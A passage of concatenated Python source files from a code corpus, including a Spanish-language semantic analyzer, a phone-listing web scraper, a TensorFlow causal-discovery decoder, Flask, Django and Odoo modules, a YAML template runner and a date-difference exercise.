nombre = linea.split(' ')[1].strip() \n contador = contador + 1\n cuerpo = \"\"\n for linea2 in f:\n if linea2 != ' ':\n x = re.search('\\{',linea2)\n y = re.search('\\}',linea2)\n if(x):\n z = re.search(nombre,linea2)\n if (z):\n contador = contador + 1\n contador2 = contador2 + 1\n else:\n if(self._tieneParametros(linea) == True):\n x1 = 3\n while x1 < linea.count(\" \") - 1:\n if linea.split(' ')[x1].strip() != ',':\n tipoV = linea.split(' ')[x1].strip()\n if linea.split(' ')[x1+1].strip() != ',':\n nombreV = linea.split(' ')[x1+1].strip()\n variable = Variable.Variable(tipoV,nombreV,None,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombreV,variable)\n x1 = x1 + 3\n \n cuerpo = cuerpo + linea2\n contador = contador+1\n contador2 = contador2 + 1\n \n for i in range(len(self.tokens)):\n if linea2.split(' ')[0].strip() == self.tokens[i]:\n tipo3 = linea2.split(' ')[0].strip()\n nombre3 = linea2.split(' ')[1].strip()\n if tipo3 == \"int\":\n valor13 = linea2.split('=')[1].strip()\n valor3 = valor13.replace(';','')\n \n variable = Variable.Variable(tipo3,nombre3,valor3,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombre3,variable)\n else:\n if(y):\n contador = contador-1\n if(contador == 0): \n break\n cuerpo = cuerpo + linea2\n contador2 = contador2 + 1\n\n for i in range(len(self.tokens)):\n if linea2.split(' ')[0].strip() == self.tokens[i]:\n tipo3 = linea2.split(' ')[0].strip()\n nombre3 = linea2.split(' ')[1].strip()\n valor13 = linea2.split('=')[1].strip()\n valor3 = valor13.replace(';','')\n \n variable = Variable.Variable(tipo3,nombre3,valor3,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombre3,variable)\n \n else:\n cuerpo = cuerpo + linea2\n contador2 = contador2 + 1\n\n for i in range(len(self.tokens)):\n if linea2.split(' ')[0].strip() == self.tokens[i]:\n tipo3 = linea2.split(' ')[0].strip()\n nombre3 = linea2.split(' ')[1].strip()\n valor13 = linea2.split('=')[1].strip()\n valor3 = valor13.replace(';','')\n \n variable = Variable.Variable(tipo3,nombre3,valor3,\"local\",self._numerodelineas(linea2))\n self.tabla.Insert(nombre3,variable)\n \n \n\n funcion = Funcion.Funcion(linea.split(' ')[0].strip(),nombre,cuerpo,self._numerodelineas(linea2))\n self.tabla.Insert(nombre,funcion)\n\n else:\n if(contador2 == 0):\n if linea.count(\" \") == 2:\n nombre = linea.split(' ')[0].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n\n variable = Variable.Variable(None,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n else:\n tipo = linea.split(' ')[0].strip()\n nombre = linea.split(' ')[1].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n \n variable = Variable.Variable(tipo,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n elif linea.count(\" \") == 3:\n tipo = linea.split(' ')[0].strip()\n nombre = linea.split(' ')[1].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n\n variable = Variable.Variable(tipo,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n elif linea.count(\" \") == 2:\n nombre = linea.split(' ')[0].strip()\n valor1 = linea.split('=')[1].strip()\n valor = valor1.replace(';','')\n\n variable = Variable.Variable(None,nombre,valor,\"global\",self._numerodelineas(linea))\n self.tabla.Insert(nombre,variable)\n\n def _imprimir(self):\n print(self.tabla.Search('cadena').getValor())\n\n def _tieneParametros(self,linea):\n x = 
re.search('\\(' '\\)',linea)\n\n if(x):\n return False\n return True\n\n def _esInt(self,linea):\n x = re.search('int',linea)\n if(x):\n return True\n else:\n return False\n\n def _cualTipoes(self,tipo):\n if tipo == \"int\":\n return int\n if tipo == \"string\":\n return str\n if tipo == \"float\":\n return float\n\n def _numerodelineas(self,lineaAbuscar):\n contador = 1\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n if linea == lineaAbuscar:\n return contador\n contador = contador +1\n\n def _while_if(self,linea):\n x = re.search('if',linea)\n y = re.search('while',linea)\n\n if x or y:\n return True\n return False\n\n def es_flotante(self,variable):\n try:\n float(variable)\n return True\n except:\n return False\n \n def es_int(self,variable):\n try:\n int(variable)\n return True\n except:\n return False\n\n\n def _imprimirArchivo(self):\n contador = 1\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n print(contador , \" \", linea,end='')\n contador = contador+1\n print()\n\n def _estaenlaTabla(self,variable):\n if self.tabla.Search(variable) != None:\n return True\n return False\n\n def _errorDeCuerpoFunciones(self):\n contador = 0\n contu = 0\n cont = 0\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n cont = 0\n if self._esFuncion(linea) is True and self._while_if(linea) is False:\n nombre = linea.split(' ')[1].strip() \n cuerpo = self.tabla.Search(nombre).getCuerpo()\n \n for i in cuerpo:\n if i == '\\n':\n contador = contador + 1\n\n for linea2 in f:\n if linea2 !=' ':\n tipo = self.tabla.Search(nombre).getTipo()\n x = re.search('return',cuerpo)\n\n if(x and tipo == \"void\" and cont == 0):\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" 'return' no valido en funciones void\")\n cont = cont+1\n \n if linea2.split(' ')[0].strip() == \"return\":\n nombreV1 = linea2.split(' ')[1].strip()\n nombreV = nombreV1.replace(';','')\n if self._estaenlaTabla(nombreV) == True:\n tipoV = self.tabla.Search(nombreV).getTipo()\n \n if tipoV == None:\n print(\"Error en linea:\" , self._numerodelineas(linea2) + contador ,\"La variable \", \"'\",self.tabla.Search(nombreV).getNombre(),\"'\", \" No esta declarada\")\n\n elif tipoV != tipo:\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor de retorno no coincide con el tipo de funcion\")\n else:\n if self.es_int(nombreV) == False and self.es_flotante(nombreV) == False:\n if tipo != \"string\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor de retorno no coincide con el tipo de funcion\")\n\n if self.es_int(nombreV) == True or self.es_flotante(nombreV) == True:\n if tipo != \"int\" and \"float\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor de retorno no coincide con el tipo de funcion\")\n\n if linea2.count(\" \") == 2:\n conta = 0\n nombreV2 = linea2.split(' ')[0].strip()\n valor12 = linea2.split('=')[1].strip()\n valor2 = valor12.replace(';','')\n\n \n if self.es_int(valor2) == True and conta == 0:\n if self.tabla.Search(nombreV2).getTipo() != \"int\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor del tipo de variable\",\"'\",self.tabla.Search(nombreV2).getNombre(),\"'\",\"no coincide\")\n conta = conta+1\n \n if self.es_flotante(valor2) == True and self.tabla.Search(nombreV2).getAlcance() == \"local\" and conta == 0:\n if self.tabla.Search(nombreV2).getTipo() != \"float\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor del tipo de 
variable\",\"'\",self.tabla.Search(nombreV2).getNombre(),\"'\",\"no coincide\")\n conta = conta + 1\n\n if self.es_flotante(valor2) == False and self.es_int(valor2) == False:\n if self.tabla.Search(nombreV2).getTipo() != \"string\":\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" valor del tipo de variable\",\"'\",self.tabla.Search(nombreV2).getNombre(),\"'\",\"no coincide\")\n conta = 0 \n\n nombreParametro = \"\"\n if self._while_if(linea2) is True:\n nombreParametro = linea2.split(' ')[2].strip() \n if self.tabla.Search(nombreParametro) == None:\n print(\"Error en linea:\" , self._numerodelineas(linea2) , \" La variable \",\"'\", nombreParametro,\"'\", \" no esta declarada\")\n contu = contu + 1\n if contu == contador:\n break\n\n def _errorAsignacion(self):\n contador = 0\n contador2 = 0\n\n with open(\"codigo.txt\", \"r\") as f:\n for linea in f:\n if self._esFuncion(linea) is True and self._while_if(linea) is False:\n nombre = linea.split(' ')[1].strip() \n for i in range(len(self.tokens)):\n if self.tabla.Search(nombre).getTipo() != self.tokens[i]:\n contador = contador + 1\n if contador == 4: \n print(\"Error en linea:\" , self._numerodelineas(linea) , \" Tipo de dato: \" + self.tabla.Search(nombre).getTipo() + \" no valido\")\n contador = 0 \n else:\n if linea.count(\" \") == 3:\n nombre = linea.split(' ')[1].strip()\n for i in range(len(self.tokens)):\n if self.tabla.Search(nombre).getTipo() != self.tokens[i]:\n contador = contador + 1\n if contador == 4: \n if self.tabla.Search(nombre).getTipo() != None:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" Tipo de dato: \" , self.tabla.Search(nombre).getTipo() , \" no valido\")\n if self.tabla.Search(nombre).getTipo() == None:\n print(\"Error en linea:\" , self._numerodelineas(linea) ,\"La variable \" ,\"'\",self.tabla.Search(nombre).getNombre(),\"'\",self.tabla.Search(nombre).getNombre(), \" No esta declarada\")\n contador = 0\n\n if self.tabla.Search(nombre).getValor().isdigit() == True:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != int and self._cualTipoes(self.tabla.Search(nombre).getTipo()) != float:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n\n if self.tabla.Search(nombre).getValor().isdigit() != True and self.es_flotante(self.tabla.Search(nombre).getValor()) is False:\n if self._estaenlaTabla(self.tabla.Search(nombre).getValor()) == True:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != str and self.tabla.Search(self.tabla.Search(nombre).getValor()).getTipo() != self.tabla.Search(nombre).getTipo():\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n else:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != str:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n if self.es_flotante(self.tabla.Search(nombre).getValor()) == True and self.tabla.Search(nombre).getValor().isdigit() == False:\n if self._cualTipoes(self.tabla.Search(nombre).getTipo()) != float:\n print(\"Error en linea:\" , self._numerodelineas(linea) , \" valor del tipo de variable\",self.tabla.Search(nombre).getNombre(),\"no coincide\")\n \n \n elif linea.count(\" \") == 2:\n nombre = linea.split(' ')[0].strip() \n for i in range(len(self.tokens)):\n if self.tabla.Search(nombre).getTipo() != 
self.tokens[i]:\n                            contador = contador + 1\n                    if contador == 4: \n                        if self.tabla.Search(nombre).getTipo() != None:\n                            print(\"Error en linea:\" , self._numerodelineas(linea) , \" Tipo de dato: \" , self.tabla.Search(nombre).getTipo() , \" no valido\")\n                        if self.tabla.Search(nombre).getTipo() == None:\n                            print(\"Error en linea:\" , self._numerodelineas(linea) ,\"La variable \", \"'\",self.tabla.Search(nombre).getNombre(),\"'\", \" No esta declarada\")\n                        contador = 0\n\n                    \n                    \n\n\n\n","sub_path":"Proyecto_2/Proyecto_2/AnalizadorSemantico.py","file_name":"AnalizadorSemantico.py","file_ext":"py","file_size_in_byte":18166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"461587205","text":"from bs4 import BeautifulSoup;\nimport requests ;\nimport json;\n\ndef makeRequestAndGetHtml(mobileSpecificationLink):\n    clickedPhoneURL = mobileSpecificationLink;\n    phoneSpecificationContent = requests.get(clickedPhoneURL);\n    soup = BeautifulSoup(phoneSpecificationContent.text,\"html.parser\");\n    return soup;\ndef getPhoneSpecification(mobileSpecificationLink):\n    topSpecificationData = {}\n    localTempArr = [];\n##    clickedPhoneURL = mobileSpecificationLink;\n##    phoneSpecificationContent = requests.get(clickedPhoneURL);\n    soup = makeRequestAndGetHtml(mobileSpecificationLink);\n    specificationData = (soup.find(\"div\", {\"class\": \"item-specification-top\"}).getText().replace(\"\\\n\", \"\").strip());\n    for topSpecficaion in soup.find_all('ul', {'class': 'specification-top'}):\n        for litag in topSpecficaion.find_all('li'):\n##            print(litag.find('span').getText());\n            localTempArr.append(litag.find('span').getText())\n\n##    print(localTempArr);\n    topSpecificationData[\"camera\"] = localTempArr[0];\n    topSpecificationData[\"battery\"] = localTempArr[1];\n    topSpecificationData[\"os\"] = localTempArr[2];\n    topSpecificationData[\"storage\"] = localTempArr[3];\n    topSpecificationData[\"display\"] = localTempArr[4];\n    return topSpecificationData;\n\n\ndef getFullPhoneSpec(mobileSpecificationLink):\n##    Getting Full Spec \n    fullSpecificationData = {};\n##    clickedPhoneURL = mobileSpecificationLink;\n##    phoneSpecificationContent = requests.get(clickedPhoneURL);\n    soup = makeRequestAndGetHtml(mobileSpecificationLink);\n    specificationData = (soup.find(\"div\", {\"class\": \"item-specification\"}).getText().replace(\"\\\n\", \"\").strip());\n    for topSpecficaion in soup.find_all('ul', {'class': 'specification'}):\n        for litag in topSpecficaion.find_all('li'):\n            fullSpecificationData[litag.find('label').getText()] = litag.find('span').getText()\n##            print(litag.find('label').getText());\n##            print(litag.find('span').getText());\n\n##    print(\"Full Spec\")\n##    print(fullSpecificationData);\n##    print(\"Full Spec\")\n    return fullSpecificationData;\ndef getMemory(mobName):\n    tempVar = mobName;\n    if ('Samsung' in tempVar):\n        memory = {\"size1\":\"32 GB\",\"size2\":\"64 GB\",\"size3\":\"128 GB\"}\n        return memory;\n    else:\n        memory = {\"size1\":\"64 GB\",\"size2\":\"128 GB\",\"size3\":\"256 GB\"}\n        return memory;\n\ndef getColour(mobName):\n    tempVar = mobName;\n    if ('Samsung' in tempVar):\n        memory = {\"colour1\":\"Black\",\"colour2\":\"Blue\",\"colour3\":\"Grey\"}\n        return memory;\n    else:\n        memory = {\"colour1\":\"Grey\",\"colour2\":\"Silver\"}\n        return memory;\n    \n    \n## JSON file to be saved in DB\nphoneDataSet = {\"phones\":[]};\n\ntempArr = []\nurlArray = 
[\"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones?manufacturer=10&p=1\",\"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones?manufacturer=10&p=2\",\"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones?manufacturer=11\"]\nbase_url = \"https://eshop.lycamobile.co.uk/pay-as-you-go-mobile-phones\"\nmobileId = 100;\nfor url in urlArray:\n## print(url)\n content = requests.get(url);\n soup = BeautifulSoup(content.text,\"html.parser\");\n #print(soup);\n \n phoneData =soup.find_all(\"div\", {\"class\": \"product-item-info\"});\n## Loops through each mobile phone listen in the site. if there was 6mobile phones listed then loops 6\n for row in soup.find_all(\"div\", {\"class\": \"product-item-info\"}):\n mobName = (row.find(\"a\", {\"class\": \"product-item-link\"}).getText().replace(\"\\n\", \"\").strip());\n mobileSpecificationLink = ((row.find(\"a\", {\"class\": \"product-item-link\"}).get('href')));\n ##print((row.find(\"a\", {\"class\": \"product-item-link\"}).get('href')));\n \n mobPrice = (row.find(\"span\", {\"class\": \"price-wrapper \"}).getText().replace(\"\\n\", \"\").strip());\n mobStock = (row.find(\"div\", {\"class\": \"stock available\"}).getText().replace(\"\\n\", \"\").strip());\n \n## getColours(mobName);\n phoneDataSet['phones'].append({'mobileId':mobileId,'mobileName':mobName,\\\n 'mobilePrice':int(float(mobPrice.replace('£','').replace(',',''))),'mobileStock':mobStock, \\\n \"topSpec\":getPhoneSpecification(mobileSpecificationLink),\\\n \"fullSpec\":getFullPhoneSpec(mobileSpecificationLink),\\\n \"sizeVariant\":getMemory(mobName),\"colourVariant\":getColour(mobName)});\n mobileId = mobileId + 1;\n## break;\n print();\n \n\n## If getting price return this error 'NoneType' object has no attribute 'getText'\n## it means product is either out of stock or not sold anymore\n\n \nprint(phoneDataSet);\nwith open('data3.json', 'w') as fp:\n json.dump(phoneDataSet, fp)\n\n\n\n\n\n\n## Due to website using same class name for both size and colour im unable to get colour :(\ndef getColourVariants(mobileSpecificationLink):\n print(\"Getting Colour Variant\")\n soup = makeRequestAndGetHtml(mobileSpecificationLink);\n colourVariatnsData = (soup.find(\"div\", {\"class\": \"swatch-attribute-selected-option\"}));\n print(colourVariatnsData)\n\n#soup.find(\"div\", {\"class\": \"product-item-info\"});\n\n##data = {\"name\":\"Sameerul\"}\n##new_result = {'Mobile_Name':'Samsung S9+','Price':'£649.00'}\n##phoneDataSet['phones'].append(new_result)\n####print(phoneData)\n\n##new_result = {'Mobile_Name':'Samsung S7 Edge','Price':'£546.00','topSpecification':{'camera':'12mp'}}\n##phoneDataSet['phones'].append(new_result)\n##print(phoneDataSet)\n##with open('data.json', 'w') as fp:\n## json.dump(phoneDataSet, fp) \n \n","sub_path":"web_Scraping_2.py","file_name":"web_Scraping_2.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"229669180","text":"import tensorflow as tf\nfrom tensorflow.contrib import distributions as distr\n\n\nclass SingleLayerDecoder(object):\n\n def __init__(self, config, is_train):\n self.batch_size = config.batch_size # batch size\n self.max_length = config.max_length # input sequence length (number of cities)\n self.input_dimension = config.hidden_dim\n self.input_embed = config.hidden_dim # dimension of embedding space (actor)\n self.max_length = config.max_length\n self.decoder_hidden_dim = config.decoder_hidden_dim\n self.initializer = 
tf.contrib.layers.xavier_initializer() # variables initializer\n self.decoder_activation = config.decoder_activation\n self.use_bias = config.use_bias\n self.bias_initial_value = config.bias_initial_value\n self.use_bias_constant = config.use_bias_constant\n\n self.is_training = is_train\n\n self.samples = []\n self.mask = 0\n self.mask_scores = []\n self.entropy = []\n\n def decode(self, encoder_output):\n # encoder_output is a tensor of size [batch_size, max_length, input_embed]\n with tf.variable_scope('singe_layer_nn'):\n W_l = tf.get_variable('weights_left', [self.input_embed, self.decoder_hidden_dim], initializer=self.initializer)\n W_r = tf.get_variable('weights_right', [self.input_embed, self.decoder_hidden_dim], initializer=self.initializer)\n U = tf.get_variable('U', [self.decoder_hidden_dim], initializer=self.initializer) # Aggregate across decoder hidden dim\n\n dot_l = tf.einsum('ijk, kl->ijl', encoder_output, W_l)\n dot_r = tf.einsum('ijk, kl->ijl', encoder_output, W_r)\n\n tiled_l = tf.tile(tf.expand_dims(dot_l, axis=2), (1, 1, self.max_length, 1))\n tiled_r = tf.tile(tf.expand_dims(dot_r, axis=1), (1, self.max_length, 1, 1))\n\n if self.decoder_activation == 'tanh': # Original implementation by paper\n final_sum = tf.nn.tanh(tiled_l + tiled_r)\n elif self.decoder_activation == 'relu':\n final_sum = tf.nn.relu(tiled_l + tiled_r)\n elif self.decoder_activation == 'none': # Without activation function\n final_sum = tiled_l + tiled_r\n else:\n raise NotImplementedError('Current decoder activation is not implemented yet')\n\n # final_sum is of shape (batch_size, max_length, max_length, decoder_hidden_dim)\n logits = tf.einsum('ijkl, l->ijk', final_sum, U) # Readability\n\n if self.bias_initial_value is None: # Randomly initialize the learnable bias\n self.logit_bias = tf.get_variable('logit_bias', [1])\n elif self.use_bias_constant: # Constant bias\n self.logit_bias = tf.constant([self.bias_initial_value], tf.float32, name='logit_bias')\n else: # Learnable bias with initial value\n self.logit_bias = tf.Variable([self.bias_initial_value], tf.float32, name='logit_bias')\n\n if self.use_bias: # Bias to control sparsity/density\n logits += self.logit_bias\n\n self.adj_prob = logits\n\n for i in range(self.max_length):\n position = tf.ones([encoder_output.shape[0]]) * i\n position = tf.cast(position, tf.int32)\n\n # Update mask\n self.mask = tf.one_hot(position, self.max_length)\n\n masked_score = self.adj_prob[:,i,:] - 100000000.*self.mask\n prob = distr.Bernoulli(masked_score) # probs input probability, logit input log_probability\n\n sampled_arr = prob.sample() # Batch_size, seqlenght for just one node\n\n self.samples.append(sampled_arr)\n self.mask_scores.append(masked_score)\n self.entropy.append(prob.entropy())\n\n return self.samples, self.mask_scores, self.entropy\n","sub_path":"research/Causal Discovery with RL/src/models/decoder/single_layer_decoder.py","file_name":"single_layer_decoder.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545653634","text":"from flask import current_app, Blueprint, session, g, request\nfrom ggfrc import models, db\nimport requests\n\nbp = Blueprint('persona', __name__, url_prefix=\"/_auth\")\n\n@bp.before_app_request\ndef get_current_user():\n g.user = None\n email = session.get('email')\n\n if email is not None:\n user = models.User.get_user_by_email(email)\n g.user = email\n\n@bp.route('/login', methods=['GET', 'POST'])\ndef login():\n\n resp 
= _verify_user(request.form['assertion'], request.host_url)\n\n    if resp is not None and resp.ok:\n        verification_data = resp.json()\n\n        if verification_data['status'] == 'okay':\n            email = verification_data['email']\n\n            # This user has never logged in before\n            if not models.User.get_user_by_email(email):\n                user = models.User(email=email)\n                db.session.add(user)\n                try:\n                    db.session.commit()\n                except Exception:\n                    db.session.rollback()\n                    return \"USER NOT CREATED\", 500\n\n            session['email'] = email\n\n            return 'OK'\n\n    return 'Bad Request', 400\n\n\ndef _verify_user(assertion, audience):\n\n    if not assertion or not audience:\n        raise RuntimeError(\"Cannot assert nothing\")\n\n    return requests.post(current_app.iniconfig.get('persona', 'PERSONA_VERIFIER'), data={\n        'assertion': assertion,\n        'audience': audience\n    }, verify=True)\n\n@bp.route('/logout', methods=['POST'])\ndef logout():\n    session.clear()\n    return 'OK'\n","sub_path":"ggfrc/blueprints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"277125680","text":"\"\"\"Define url paths used for learning_logs\"\"\"\nfrom django.urls import path,re_path\nfrom . import views\n\nurlpatterns = [\n\t\t\t\t#home page\n\t\t\t\tpath('',views.index, name='index'),\n\t\t\t\t\n\t\t\t\t#show topics\n\t\t\t\tpath('topics/', views.topics, name='topics'),\n\t\t\t\t\n\t\t\t\t#detail in topic\n\t\t\t\tre_path('topics/(?P<topic_id>\\\d+)/', views.topic, name='topic'),\n\t\t\t\t\n\t\t\t\t#page for adding a new topic\n\t\t\t\tpath('new_topic/', views.new_topic, name='new_topic'),\n\t\t\t\t\n\t\t\t\t#page for adding a new entry\n\t\t\t\tre_path('new_entry/(?P<topic_id>\\\d+)/', views.new_entry, name='new_entry'),\n\t\t\t\t\n\t\t\t\tre_path('edit_entry/(?P<entry_id>\\\d+)/', views.edit_entry, name='edit_entry')\n\t\t\t\t\n\t\t\t\t]\n\napp_name = 'learning_logs'\n","sub_path":"learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"476894601","text":"import numpy as np\nfrom PIL import Image\n\ndef array_img_save(array, save_path, normal=True, binary=False):\n    if binary:\n        array[array > 0.5] = 1\n        array[array <= 0.5] = 0\n\n    if normal:\n        array = array * 255\n\n    if np.shape(array)[2] == 1:\n        array = np.tile(array, [1, 1, 3])\n\n    array = array.astype(np.uint8)\n    img = Image.fromarray(array)\n    img.save(save_path)","sub_path":"TF_Build/TF_Build/tool/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"300411309","text":"# -*- coding: utf-8 -*-\n# (c) 2014 scosist\n# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html\n\nfrom odoo import models, fields, api\nimport odoo.addons.decimal_precision as dp\n\n\nclass SimulatedPickProduct(models.TransientModel):\n    _name = 'simulated.pick.product'\n\n    sim_prod_id = fields.Many2one(\n        comodel_name='product.product',\n        string='Simulated Product',\n        required=True,\n        ondelete=\"no action\",\n        index=True)\n\n    product_id = fields.Many2one(\n        comodel_name='product.product',\n        string='Product',\n        required=True,\n        ondelete=\"no action\",\n        index=True)\n\n    product_qty = fields.Float(\n        string=\"Req'd Qty\",\n        digits=dp.get_precision('Product Unit of Measure'),\n        required=True)\n\n    on_hand_before = fields.Float(\n        string='On-Hand Before',\n        digits=dp.get_precision('Product Unit of Measure'),\n        required=True)\n\n    on_hand_after = 
fields.Float(\n string='On-Hand After',\n digits=dp.get_precision('Product Unit of Measure'),\n required=True)\n\n short = fields.Float(\n string='Short',\n digits=dp.get_precision('Product Unit of Measure'),\n required=True)\n\n proc_action = fields.Char(string='Action')\n\n routing_detail = fields.Char(string=\"Routing Detail\")\n\n categ_id = fields.Many2one(\n comodel_name='product.category',\n related='product_id.categ_id',\n string='Internal Category',\n store=True)\n\n product_uom = fields.Many2one(\n comodel_name='product.uom',\n related='product_id.uom_id',\n string='UoM',\n store=True)\n\n default_supplier_id = fields.Many2one(\n comodel_name='res.partner',\n string='Supplier',\n compute='_compute_default_supplier',\n readonly=True,\n index=True,\n store=True)\n\n @api.depends('product_id')\n def _compute_default_supplier(self):\n for line in self:\n line.default_supplier_id = line.product_id.seller_ids and line.product_id.seller_ids[0].name or False\n\n @api.multi\n def action_material_analysis(self):\n self.ensure_one()\n return self.product_id.action_material_analysis()\n","sub_path":"simulated_pick/models/simulated_pick_product.py","file_name":"simulated_pick_product.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"280931078","text":"import os\nimport yaml\nfrom .actions import *\nfrom .util import AnytException, CONFIG_FILE_EXT\n\n_valid_keys = {\n \"mkdir\": [\n \"name\",\n ],\n \"rm\": [\n \"name\"\n ],\n \"cp\": [\n \"src\",\n \"dest\",\n ],\n \"shell\": [\n \"command\",\n \"args\",\n ]\n }\n\nclass Template:\n def __init__(self, name, searchpaths):\n self.path, self.name = self._find_first_template(name, searchpaths)\n with open(f\"{self.path}/{self.name}.{CONFIG_FILE_EXT}\", \"r\") as template:\n self.template = template.read()\n\n def run(self, args=[]):\n if self.template is None:\n print(\"ERROR: template empty\")\n return\n self._preprocess(args)\n self._parse()\n\n def _preprocess(self, args):\n for num, arg in enumerate(args):\n self.template = self.template.replace(f\"$input{num}\", arg) #inputs\n self.template = self.template.replace(\"$tp\", f\"{self.path}\") #template path\n self.template = self.template.replace(\"$cwd\", f\"{os.getcwd()}\") #current working directory\n\n @staticmethod\n def _loop_templates(paths):\n for path in paths:\n for dirpath, _, files in os.walk(path):\n for file in files:\n filename, fileext = os.path.splitext(file)\n dirname = os.path.basename(dirpath)\n if fileext == f\".{CONFIG_FILE_EXT}\" and filename == dirname:\n yield (dirpath, filename)\n\n @staticmethod\n def _find_first_template(name, paths):\n for tpath, tname in Template._loop_templates(paths):\n if name == tname:\n return (tpath, tname)\n raise AnytException(f\"ERROR: no template found by the name \\\"{name}\\\"\")\n \n @staticmethod\n def find_all_templates(paths):\n templates = 0\n for tpath, tname in Template._loop_templates(paths):\n yield tname\n templates += 1\n if templates == 0:\n raise AnytException(f\"WARNING: no templates found\")\n\n def _parse(self):\n template = yaml.load(self.template, Loader=yaml.FullLoader)\n if template == None:\n raise AnytException(f\"ERROR: template empty\")\n for action in template:\n if action[\"type\"] == \"mkdir\":\n mkdir(action[\"name\"])\n if action[\"type\"] == \"rm\":\n rm(action[\"name\"], action[\"recursive\"])\n if action[\"type\"] == \"cp\":\n copypaste(action[\"src\"], action[\"dest\"])\n if action[\"type\"] == 
\"shell\":\n                shell(action[\"command\"], action[\"args\"])\n","sub_path":"anytialize/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"266556498","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport os.path\n\nfrom kivy.lang import Builder\n\nfrom from_to import FromToWidget\nfrom presenter_mock import PresenterMock\nfrom model.gamestate import *\n\n\nclass FromToTest(unittest.TestCase):\n    def setUp(self):\n        players = Players([Player('Andrey', []), Player('Boris', []),\n                           Player('Charlie', []), Player('Dmitry', [])])\n        players.set_next_pair_strategy(TraditionalStrategy(players.players))\n        hat = Hat(['стул', 'шапка', 'кастрюлька'])\n        game_round = GameRound(20, [], '', (players.players[0],\n                                            players.players[2]))\n        self.gamestate = GameState(players, hat, game_round,\n                                   0, [], None,\n                                   Settings(20, 30))\n        self.presenter = PresenterMock(Phase.COUNTDOWN)\n\n    def test_round_creation_and_button_press(self):\n        self.gamestate.game_round = None\n        widget = FromToWidget(self.gamestate, self.presenter)\n        self.assertEqual(self.presenter.is_phase_changed, False)\n        self.assertEqual(self.gamestate.game_round.players_pair,\n                         (self.gamestate.players.players[0],\n                          self.gamestate.players.players[2]))\n        self.assertEqual(self.presenter.is_phase_changed, False)\n        widget.finish()\n        self.assertEqual(self.presenter.is_phase_changed, True)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"ui/from_to_test.py","file_name":"from_to_test.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"456796181","text":"# Hint: use Google to find python function\nimport time\nimport calendar\nfrom datetime import date\n####a) \ndate_start = '01-02-2013' \ndate_stop = '07-28-2015' \n\ndate_start_list = date_start.split(\"-\")\ndate_start_list = [ int(x) for x in date_start_list]\ndate_stop_list = date_stop.split(\"-\")\ndate_stop_list = [ int(x) for x in date_stop_list]\ndays_between = date(date_stop_list[2], date_stop_list[0], date_stop_list[1]) - date(date_start_list[2], date_start_list[0], date_start_list[1])\n\nprint (days_between.days, \"days\")\n####b) \ndate_start = '12312013' \ndate_stop = '05282015' \n\ndays_between = date(int(date_stop[4:]), int(date_stop[0:2]), int(date_stop[2:4])) - date(int(date_start[4:]), int(date_start[0:2]), int(date_start[2:4]))\n\nprint (days_between.days, \"days\")\n\n####c) \ndate_start = '15-Jan-1994' \ndate_stop = '14-Jul-2015' \n\ndate_start_list = date_start.split(\"-\")\ndate_stop_list = date_stop.split(\"-\")\n\ndays_between = date(int(date_stop_list[2]), 